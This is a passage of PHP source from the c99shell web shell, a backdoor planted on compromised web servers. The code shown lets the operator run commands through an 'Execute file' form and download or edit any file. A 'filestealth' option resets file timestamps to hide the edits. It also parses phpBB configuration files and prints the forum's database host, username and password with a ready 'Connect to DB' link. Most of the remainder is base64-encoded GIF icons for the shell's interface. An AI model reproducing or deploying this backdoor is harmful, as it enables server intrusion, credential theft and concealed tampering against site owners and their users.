2506 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
2507 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
2508 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
2509 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
2510 <P>"; 
2511   } 
2512   elseif ($ft == "html") 
2513   { 
2514    if ($white) {@ob_clean();} 
2515    echo $r; 
2516    if ($white) {c99shexit();} 
2517   } 
2518   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
2519   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
2520   elseif ($ft == "phpsess") 
2521   { 
2522    echo "<pre>"; 
2523    $v = explode("|",$r); 
2524    echo $v[0]."<br>"; 
2525    var_dump(unserialize($v[1])); 
2526    echo "</pre>"; 
2527   } 
2528   elseif ($ft == "exe") 
2529   { 
2530    $ext = explode(".",$f); 
2531    $c = count($ext)-1; 
2532    $ext = $ext[$c]; 
2533    $ext = strtolower($ext); 
2534    $rft = ""; 
2535    foreach($exeftypes as $k=>$v) 
2536    { 
2537     if (in_array($ext,$v)) {$rft = $k; break;} 
2538    } 
2539    $cmd = str_replace("%f%",$f,$rft); 
2540    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
2541   } 
2542   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
2543   elseif ($ft == "code") 
2544   { 
2545    if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
2546    { 
2547     $arr = explode("\n",$r); 
2548     if (count($arr == 18)) 
2549     { 
2550      include($d.$f); 
2551      echo "<b>phpBB configuration is detected in this file!<br>"; 
2552      if ($dbms == "mysql4") {$dbms = "mysql";} 
2553      if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
2554      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
2555      echo "Parameters for manual connect:<br>"; 
2556      $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
2557      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
2558      echo "</b><hr size=\"1\" noshade>"; 
2559     } 
2560    } 
2561    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
2562    if (!empty($white)) {@ob_clean();} 
2563    highlight_file($d.$f); 
2564    if (!empty($white)) {c99shexit();} 
2565    echo "</div>"; 
2566   } 
2567   elseif ($ft == "download") 
2568   { 
2569    @ob_clean(); 
2570    header("Content-type: application/octet-stream"); 
2571    header("Content-length: ".filesize($d.$f)); 
2572    header("Content-disposition: attachment; filename=\"".$f."\";"); 
2573    echo $r; 
2574    exit; 
2575   } 
2576   elseif ($ft == "notepad") 
2577   { 
2578    @ob_clean(); 
2579    header("Content-type: text/plain"); 
2580    header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
2581    echo($r); 
2582    exit; 
2583   } 
2584   elseif ($ft == "img") 
2585   { 
2586    $inf = getimagesize($d.$f); 
2587    if (!$white) 
2588    { 
2589     if (empty($imgsize)) {$imgsize = 20;} 
2590     $width = $inf[0]/100*$imgsize; 
2591     $height = $inf[1]/100*$imgsize; 
2592     echo "<center><b>Size:</b>&nbsp;"; 
2593     $sizes = array("100","50","20"); 
2594     foreach ($sizes as $v) 
2595     { 
2596      echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
2597      if ($imgsize != $v ) {echo $v;} 
2598      else {echo "<u>".$v."</u>";} 
2599      echo "</a>&nbsp;&nbsp;&nbsp;"; 
2600     } 
2601     echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
2602    } 
2603    else 
2604    { 
2605     @ob_clean(); 
2606     $ext = explode($f,"."); 
2607     $ext = $ext[count($ext)-1]; 
2608     header("Content-type: ".$inf["mime"]); 
2609     readfile($d.$f); 
2610     exit; 
2611    } 
2612   } 
2613   elseif ($ft == "edit") 
2614   { 
2615    if (!empty($submit)) 
2616    { 
2617     if ($filestealth) {$stat = stat($d.$f);} 
2618     $fp = fopen($d.$f,"w"); 
2619     if (!$fp) {echo "<b>Can't write to file!</b>";} 
2620     else 
2621     { 
2622      echo "<b>Saved!</b>"; 
2623      fwrite($fp,$edit_text); 
2624      fclose($fp); 
2625      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
2626      $r = $edit_text; 
2627     } 
2628    } 
2629    $rows = count(explode("\r\n",$r)); 
2630    if ($rows < 10) {$rows = 10;} 
2631    if ($rows > 30) {$rows = 30;} 
2632    echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
2633   } 
2634   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
2635   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
2636 } 
2637 } 
2638 } 
2639 else 
2640 { 
2641 @ob_clean(); 
2642 $images = array( 
2643 "arrow_ltr"=> 
2644 "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
2645 "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
2646 "back"=> 
2647 "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
2648 "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
2649 "Wg0JADs=", 
2650 "buffer"=> 
2651 "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
2652 "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
2653 "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
2654 "change"=> 
2655 "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
2656 "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
2657 "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
2658 "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
2659 "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
2660 "zMshADs=", 
2661 "delete"=> 
2662 "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
2663 "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
2664 "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
2665 "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
2666 "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
2667 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2668 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
2669 "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
2670 "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
2671 "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
2672 "jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
2673 "download"=> 
2674 "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
2675 "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
2676 "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
2677 "forward"=> 
2678 "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
2679 "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
2680 "WqsJADs=", 
2681 "home"=> 
2682 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
2683 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
2684 "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
2685 "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
2686 "mode"=> 
2687 "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
2688 "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
2689 "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
2690 "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
2691 "refresh"=> 
2692 "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
2693 "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
2694 "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
2695 "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
2696 "search"=> 
2697 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
2698 "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
2699 "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
2700 "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
2701 "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
2702 "setup"=> 
2703 "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
2704 "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
2705 "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
2706 "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
2707 "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
2708 "small_dir"=> 
2709 "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
2710 "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
2711 "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
2712 "small_unk"=> 
2713 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
2714 "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
2715 "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
2716 "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
2717 "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
2718 "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
2719 "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
2720 "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
2721 "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2722 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2723 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2724 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2725 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2726 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2727 "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
2728 "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
2729 "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
2730 "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
2731 "yAsokBkQADs=", 
2732 "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
2733 "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
2734 "sort_asc"=> 
2735 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
2736 "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
2737 "sort_desc"=> 
2738 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
2739 "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
2740 "sql_button_drop"=> 
2741 "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
2742 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2743 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
2744 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
2745 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
2746 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
2747 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
2748 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
2749 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
2750 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
2751 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
2752 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
2753 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
2754 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
2755 "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
2756 "AQEAOw==", 
2757 "sql_button_empty"=> 
2758 "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
2759 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2760 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
2761 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
2762 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
2763 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
2764 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
2765 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
2766 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
2767 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
2768 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
2769 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
2770 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
2771 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
2772 "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
2773 "sql_button_insert"=> 
2774 "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
2775 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2776 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
2777 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
2778 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
2779 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
2780 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
2781 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
2782 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
2783 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
2784 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
2785 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
2786 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
2787 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
2788 "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
2789 "up"=> 
2790 "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
2791 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
2792 "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
2793 "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
2794 "write"=> 
2795 "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
2796 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
2797 "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
2798 "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
2799 "ext_asp"=> 
2800 "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
2801 "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
2802 "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
2803 "ext_mp3"=> 
2804 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
2805 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
2806 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
2807 "ext_avi"=> 
2808 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
2809 "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
2810 "PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
2811 "ext_cgi"=> 
2812 "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
2813 "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
2814 "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
2815 "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
2816 "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2817 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2818 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2819 "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
2820 "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
